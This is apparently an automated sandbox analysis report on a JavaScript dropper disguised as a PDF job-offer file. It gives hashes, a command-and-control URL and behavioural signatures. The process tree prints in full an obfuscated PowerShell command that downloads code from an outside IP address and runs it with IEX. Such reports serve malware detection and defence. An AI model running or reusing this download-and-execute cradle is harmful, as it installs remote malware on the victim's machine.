Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
19-07-2024 19:21
Static task
static1
Behavioral task
behavioral1
Sample
job_offer_personal_profile.pdf.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
job_offer_personal_profile.pdf.js
Resource
win10v2004-20240709-en
General
-
Target
job_offer_personal_profile.pdf.js
-
Size
46KB
-
MD5
4aa0d4b34e801f9e29a10988a5cb9d50
-
SHA1
e8b266857a307c5ced537018138e82f8173331fc
-
SHA256
97dabca268785ff70da0f954929ec7767861f9a72a61903bafb08691cbd8d1a0
-
SHA512
c5e511587c2d3e63b661deaa27fdccb3122a8aaa5722573fdb9a2f3ccd901e9002007a4cee4cb76b0e9db13f56e99844d8d70f1690107a6540388c0a054d4187
-
SSDEEP
768:e+2+2+w3C6+M3C6+M3C6+b3C6+aK3C6+wF3C6+DeV53C6+wn39OUz83C6+j8Gdsd:e11bC6xC6xC6AC6yC6FC6xC6zNO0wC6r
Malware Config
Extracted
http://176.113.115.177/x/z.png
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2448 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2448 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3032 wrote to memory of 2448 3032 wscript.exe 30 PID 3032 wrote to memory of 2448 3032 wscript.exe 30 PID 3032 wrote to memory of 2448 3032 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\job_offer_personal_profile.pdf.js1⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(N%ew-Obje%c%t Ne%t.W%e';$c4='bCl%ie%nt).Do%%wn%l%o';$c3='adS%tri%%ng(''h%tt%p:%%//17%%%6.1%13%.11%%5.1%%%77%/%x/z%.p%n%%%g'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448
-